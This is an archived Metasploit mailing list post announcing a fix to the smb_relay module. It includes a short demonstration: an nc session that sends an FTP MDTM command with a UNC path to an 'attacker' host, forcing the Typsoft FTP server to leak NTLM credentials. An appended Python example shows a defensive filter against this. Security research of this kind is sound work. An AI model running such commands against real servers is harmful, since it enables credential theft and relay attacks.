Metasploit mailing list archives

smb_relay has been fixed :-)


From: nicolas.ruff at gmail.com (Nicolas RUFF)
Date: Fri, 19 Dec 2008 22:40:13 +0100

I finally tracked down the bug in smb_relay, the fix has been committed to 
the 3.2 and 3.3-dev SVN trees. A big thanks to the folks who reported it 
and their patience waiting on a fix.

Confirmed working. Thanks a lot!

At this point, it would be very nice to have a browse/read/write files
payload rather than existing payloads that all expect the user to be
local administrator (which is quite uncommon nowadays).

A payload that would allow file browsing on a share where the user
profile is stored would be of highest interest. But I know this is not
something that could be done overnight ...


Bonus smb_relay attack against Typsoft FTP server, which
* runs in the current user session (and not as a service)
* allows unauthenticated use of the MDTM command
* does not properly filter parameters to the CreateFile API

Then:

$ nc -vv -n 192.168.1.100 21
(UNKNOWN) [192.168.1.100] 21 (?) open
220 TYPSoft FTP Server 1.11 ready...
MDTM \\attacker\whatever

Regards,
- Nicolas RUFF
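The Typsoft example above hinges on the server passing a client-supplied MDTM operand straight to CreateFile, so a UNC path makes the process authenticate outbound as the logged-on user. The following is an added illustration, not part of this post or of Typsoft's or Metasploit's code, of the input filter a server-side handler should apply before any file API sees the argument. The FTP root, the handler names and the in-memory modification-time table are all constructed for the demonstration.

```python
"""Confine an FTP command operand (here MDTM's) to the server root.

Added example; hypothetical handler, not the vulnerable server's code.
Assumption: the FTP root is a POSIX-style virtual path and the file
system is replaced by an in-memory table so the script runs offline.
"""
import posixpath
import re
from datetime import datetime, timezone


class UnsafePathError(ValueError):
    """Raised for any operand that must never reach a file API."""


# A leading drive letter ("C:...") is an absolute local path, not a share entry.
_DRIVE_RE = re.compile(r"^[A-Za-z]:")


def safe_ftp_path(root: str, client_arg: str) -> str:
    """Map a client-supplied path to a path that stays under ``root``.

    Rejects UNC paths (\\\\host\\share and //host/share, which also covers
    \\\\?\\ and \\\\.\\ device prefixes), drive-absolute paths, embedded NULs
    and any '..' sequence that would escape the root.
    """
    if not client_arg or "\x00" in client_arg:
        raise UnsafePathError("empty or NUL-containing operand")
    # Windows file APIs accept both separators, so normalise before checking.
    normalized = client_arg.replace("\\", "/")
    if normalized.startswith("//") or _DRIVE_RE.match(normalized):
        raise UnsafePathError(f"UNC or absolute path rejected: {client_arg!r}")
    root_norm = posixpath.normpath(root)
    # Treat a leading '/' as the FTP virtual root, then collapse '.' and '..'.
    joined = posixpath.normpath(posixpath.join(root_norm, normalized.lstrip("/")))
    prefix = root_norm.rstrip("/") + "/"
    if joined != root_norm and not joined.startswith(prefix):
        raise UnsafePathError(f"operand escapes the FTP root: {client_arg!r}")
    return joined


# Constructed stand-in for the file system: virtual path -> mtime (UTC).
FAKE_MTIMES = {
    "/srv/ftp/readme.txt": datetime(2008, 12, 19, 21, 40, 13, tzinfo=timezone.utc),
}


def handle_mdtm(root: str, arg: str, mtimes=FAKE_MTIMES) -> str:
    """Build the MDTM reply; an unsafe operand is refused before any lookup."""
    try:
        path = safe_ftp_path(root, arg)
    except UnsafePathError:
        return "550 Invalid path"
    mtime = mtimes.get(path)
    if mtime is None:
        return "550 File not found"
    return "213 " + mtime.strftime("%Y%m%d%H%M%S")


if __name__ == "__main__":
    for operand in ("readme.txt", r"\\attacker\whatever", "../../etc/passwd"):
        print(f"MDTM {operand!r} -> {handle_mdtm('/srv/ftp', operand)}")
```

The check runs on the operand string before any open, stat or CreateFile call, which is the point: once a UNC path reaches the API the outbound authentication has already happened, so a "file not found" afterwards is too late. Rejecting both separator styles and the `//` form matters because Windows canonicalises forward slashes to backslashes.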


